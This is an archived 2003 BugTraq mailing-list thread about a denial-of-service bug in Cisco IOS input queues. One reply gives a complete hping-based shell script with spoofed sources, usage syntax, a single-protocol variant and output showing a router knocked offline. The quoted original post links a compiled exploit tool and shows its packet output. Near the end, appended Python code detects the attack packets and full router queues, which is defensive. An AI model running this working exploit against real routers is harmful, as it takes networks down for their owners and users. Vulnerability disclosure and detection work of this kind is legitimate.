BugTraq
RE: Cisco IOS exploit (44020) Jul 21 2003 05:18PM
Donahue, Pat (PDonahue acmicorp com)
Here's a much simpler shell script that produces the same result:

--- BEGIN SHELL SCRIPT ---
#!/bin/tcsh -f

if ($1 == "" || $2 == "") then
    echo "usage: $0 <router hostname|address> <ttl>"
    exit
endif

# One hping run per affected IP protocol: 53 SWIPE, 55 IP Mobility,
# 77 Sun ND, 103 PIM.  19 packets x 4 protocols = 76, one more than the
# 75-entry input queue.  --rand-source spoofs the source address; --ttl
# must make the packet expire at the router (0 or 1 on arrival).
foreach protocol (53 55 77 103)
    /usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 \
        --ipproto $protocol --count 19 --interval u250 --data 26
end
--- END SHELL SCRIPT ---

There's little reason to compile source code that will be run as root if
the same thing can be accomplished with a tool that has been used and
trusted by systems administrators for quite some time. Hping can be
found at http://www.hping.org and "is a command-line oriented TCP/IP
packet assembler/analyzer".

Before upgrading my routers, I wrote this script to confirm that they
were indeed vulnerable. As you can see, the script iterates over the
various protocols (SWIPE, IP Mobility, Sun ND, PIM) and sends 19 packets
each using hping for a total of 76 (one more than needed to fill up the
input queue).

What is interesting to note is that the input queue on the interface can
be exploited using just one of the vulnerable protocols; try changing
the "foreach protocol (53 55 77 103)" line to "foreach protocol (53)"
and then changing the "--count 19" parameter to "--count 76". When I
first read the security advisory I thought that Cisco had tried to make
it seem that all 4 were necessary.

You must be able to open raw sockets, so either run the script as root or
set the suid bit. The syntax is: ./exploit.sh <hostname|address> <ttl>,
where <hostname|address> is the hostname or IP address of the vulnerable
Cisco IOS device and <ttl> is 255 minus the TTL.

Here is an example:

> ping 192.168.1.1
PING 192.168.1.1 (192.168.1.1): 56 data bytes
64 bytes from 192.168.1.1: icmp_seq=0 ttl=255 time=1.063 ms
^C

> telnet 192.168.1.1
User Access Verification

Password:
telnet> close

# ./exploit.sh 192.168.1.1 0
HPING 192.168.1.1 (rl0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes
--- 192.168.1.1 hping statistic ---
19 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
HPING 192.168.1.1 (rl0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes
--- 192.168.1.1 hping statistic ---
19 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
HPING 192.168.1.1 (rl0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes
--- 192.168.1.1 hping statistic ---
19 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
HPING 192.168.1.1 (rl0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes
--- 192.168.1.1 hping statistic ---
19 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

> telnet 192.168.1.1
Trying 192.168.1.1...
telnet: Unable to connect to remote host: No route to host

And finally, from the console:

Router> show int FastEthernet0/0 | include Input
Input queue: 75/75/0/0 (size/max/drops/flushes); Total output drops: 0

Regards,
Patrick Donahue
Network/Systems Administrator
ACMI Corporation

-----Original Message-----
From: Martin Kluge [mailto:martin (at) elxsi (dot) de]
Sent: Monday, July 21, 2003 12:02 PM
To: bugtraq (at) securityfocus (dot) com
Subject: Cisco IOS exploit (44020)

Hi,

I'd like to submit a DoS attack against the recently found bug in
almost all Cisco IOS versions (Cisco document ID 44020).

The exploit can be found here (and it is included as attachment):

http://www.elxsi.de/cisco-bug-44020.tar.gz

This exploit is NOT broken (like the shadowchode.tar.gz exploit for
example):

Example:

bash-2.05b# telnet 192.168.1.123
Trying 192.168.1.123...
Connected to 192.168.1.123.
Escape character is '^]'.

User Access Verification

Username: 103
Password: ******

1003>show version
IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Mon 01-Apr-02 19:36 by srani
Image text-base: 0x02004000, data-base: 0x0259733C

ROM: System Bootstrap, Version 5.3.2(9) [vatran 9], RELEASE SOFTWARE (fc1)
BOOTFLASH: 1000 Bootstrap Software (C1000-RBOOT-R), Version 10.3(9), RELEASE SOFTWARE (fc1)

1003 uptime is 6 minutes
System restarted by power-on
System image file is "flash:c1000-bnsy56-mz.120-22.bin"

cisco 1000 (68360) processor (revision D) with 15872K/512K bytes of memory.
Processor board ID 03305903
Bridging software.
X.25 software, Version 3.0.0.
Basic Rate ISDN software, Version 1.1.
1 Ethernet/IEEE 802.3 interface(s)
1 ISDN Basic Rate interface(s)
7K bytes of non-volatile configuration memory.

bash-2.05b# ./cisco-bug-44020 192.168.1.1 192.168.1.123 1 0
DEBUG: Hops: 1
DEBUG: Protocol: 53
DEBUG: Checksum: 47299
DEBUG: 45 10 00 14 32 20 40 00 01 35 c3 b8 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 55
DEBUG: Checksum: 61909
DEBUG: 45 10 00 14 1f e5 40 00 01 37 d5 f1 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 55
DEBUG: Checksum: 55515
DEBUG: 45 10 00 14 19 fe 40 00 01 37 db d8 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 53
DEBUG: Checksum: 10618
DEBUG: 45 10 00 14 7b af 40 00 01 35 7a 29 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 77
DEBUG: Checksum: 40137
DEBUG: 45 10 00 14 2c 24 40 00 01 4d c9 9c c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
<snip>
...
<snip>
bash-2.05b# telnet 192.168.1.123
Trying 192.168.1.123...
telnet: Unable to connect to remote host: No route to host

If I log in via term, I can see the following:

Press RETURN to get started!

00:00:30: %LINK-3-UPDOWN: Interface Ethernet0, changed state to up
00:00:32: %LINEPROTO-5-UPDOWN: Line protocol on Interface Ethernet0, changed stp
00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:1, changed staten
00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:2, changed staten
00:00:39: %SYS-5-CONFIG_I: Configured from memory by console
00:00:39: %SYS-5-RESTART: System restarted --
Cisco Internetwork Operating System Software
IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE SOFTWARE (fc)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Mon 01-Apr-02 19:36 by srani
00:00:40: %LINK-3-UPDOWN: Interface BRI0, changed state to up
1003>en
Password: ******
1003#show Interfaces Ethernet 0
Ethernet0 is up, line protocol is up
Hardware is QUICC Ethernet, address is 0060.7062.5727 (bia 0060.7062.5727)
Internet address is 192.168.1.123/24
MTU 1500 bytes, BW 10000 Kbit, DLY 1000 usec, rely 255/255, load 1/255
Encapsulation ARPA, loopback not set, keepalive set (10 sec)
ARP type: ARPA, ARP Timeout 04:00:00
Last input 00:02:04, output 00:00:04, output hang never
Last clearing of "show interface" counters never
Input queue: 75/75/0/0 (size/max/drops/flushes); Total output drops: 0
^^
||
The input queue is full :)

Cheers,
Martin Kluge
--
Name : Martin Kluge
email : martin (at) elxsi (dot) info
Phone : +49 160 1515182
Projects : http://www.aa-security.de
GPG Key : http://www.elxsi.de/key.pub
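Both posts show the attack from the sender's side (hping or the cisco-bug-44020 tool) and the result only as the 75/75/0/0 input-queue counter on the router. The script below is an added example, not part of either post or of either tool, and looks at the same two artifacts from the operator's side: it decodes raw IPv4 headers and flags the signature the posts rely on (IP protocol 53, 55, 77 or 103, TTL 0 or 1, destination being a router address), and it parses `show interfaces` output to report any input queue that is full. The first two sample packets are the 20-byte headers printed by the DEBUG lines in Martin Kluge's post, and their header checksums verify; the third packet, the set of router addresses, and the BRI0 block in the show-interfaces sample are constructed here for illustration.

```python
"""Operator-side checks for the IOS input-queue exhaustion in Cisco
document ID 44020.  Example code added to this thread, not part of
either post or of the cisco-bug-44020 tool.

  1. scan_packets(): flag IPv4 packets carrying protocol 53 (SWIPE),
     55 (IP Mobility), 77 (Sun ND) or 103 (PIM) with TTL 0 or 1 that are
     addressed to one of our routers;
  2. full_input_queues(): parse `show interfaces` and report every
     input queue whose size equals its max (the 75/75/0/0 in both posts).
"""
import re
import struct

VULNERABLE_PROTOCOLS = {53: "SWIPE", 55: "IP Mobility", 77: "Sun ND", 103: "PIM"}

# First two: header bytes from the DEBUG lines in Kluge's post (proto 53
# and 55, TTL 1, 192.168.1.1 -> 192.168.1.123).  Third: constructed here,
# an ordinary ICMP header with TTL 64, as a benign control.
SAMPLE_PACKETS = [
    bytes.fromhex("45100014322040000135c3b8c0a80101c0a8017b"),
    bytes.fromhex("451000141fe540000137d5f1c0a80101c0a8017b"),
    bytes.fromhex("45000054abcd000040014b0fc0a80101c0a8017b"),
]

# Kluge's Ethernet0 lines plus a constructed BRI0 block with an idle queue.
SHOW_INTERFACES_SAMPLE = """\
Ethernet0 is up, line protocol is up
  Hardware is QUICC Ethernet, address is 0060.7062.5727 (bia 0060.7062.5727)
  Internet address is 192.168.1.123/24
  Input queue: 75/75/0/0 (size/max/drops/flushes); Total output drops: 0
BRI0 is up, line protocol is up (spoofing)
  Input queue: 0/75/0/0 (size/max/drops/flushes); Total output drops: 0
"""

INTERFACE_RE = re.compile(r"^(\S+) is (?:up|down|administratively down)\b")
INPUT_QUEUE_RE = re.compile(r"Input queue: (\d+)/(\d+)/(\d+)/(\d+)")


def ip_checksum(header):
    """RFC 791 one's-complement checksum over the header bytes.  With the
    checksum field included and correct, the result is 0."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4_header(raw):
    """Decode the fixed IPv4 header.  Raises ValueError for anything that is
    not a complete IPv4 header with a valid checksum."""
    if len(raw) < 20:
        raise ValueError("short header")
    (ver_ihl, _tos, _length, _ident, _flags_frag,
     ttl, proto, _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    version, ihl = ver_ihl >> 4, (ver_ihl & 0x0F) * 4
    if version != 4 or ihl < 20 or len(raw) < ihl:
        raise ValueError("not a complete IPv4 header")
    if ip_checksum(raw[:ihl]) != 0:
        raise ValueError("bad header checksum")
    return {"ttl": ttl, "protocol": proto,
            "src": ".".join(map(str, src)), "dst": ".".join(map(str, dst))}


def try_parse(raw):
    """parse_ipv4_header, returning None instead of raising on malformed input."""
    try:
        return parse_ipv4_header(raw)
    except ValueError:
        return None


def is_44020_candidate(hdr, router_addrs):
    """One of the four protocols, a TTL that expires at the router (0 or 1),
    and the router itself as destination."""
    return (hdr["protocol"] in VULNERABLE_PROTOCOLS
            and hdr["ttl"] <= 1 and hdr["dst"] in router_addrs)


def scan_packets(packets, router_addrs):
    """Decoded headers matching the signature, with the protocol name attached."""
    hits = []
    for raw in packets:
        hdr = try_parse(raw)
        if hdr is not None and is_44020_candidate(hdr, router_addrs):
            hits.append(dict(hdr, protocol_name=VULNERABLE_PROTOCOLS[hdr["protocol"]]))
    return hits


def full_input_queues(show_interfaces):
    """(interface, size, max) for every saturated input queue in the output."""
    saturated, current = [], None
    for line in show_interfaces.splitlines():
        m = INTERFACE_RE.match(line)
        if m:
            current = m.group(1)
            continue
        m = INPUT_QUEUE_RE.search(line)
        if m and current is not None:
            size, maximum = int(m.group(1)), int(m.group(2))
            if size >= maximum:
                saturated.append((current, size, maximum))
    return saturated


if __name__ == "__main__":
    for h in scan_packets(SAMPLE_PACKETS, {"192.168.1.123"}):
        print("ALERT %(src)s -> %(dst)s proto %(protocol)d (%(protocol_name)s) ttl %(ttl)d" % h)
    for name, size, maximum in full_input_queues(SHOW_INTERFACES_SAMPLE):
        print("ALERT %s input queue full: %d/%d" % (name, size, maximum))
```

The checksum check matters for the packet scan: a sniffer feed contains whatever hits the wire, and a spoofed source (hping's --rand-source) is exactly what the posts use, so the only thing worth trusting in the header is that it is well formed and addressed to the router. The queue check is the condition Kluge points at with the ^^ marks; run it over `show interfaces` from each router periodically and alert on any hit, since a full input queue with no drops is the state both posts describe.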

RE: Cisco IOS exploit (44020) Jul 21 2003 08:02PM
Jerry Shenk (jshenk decommunications com)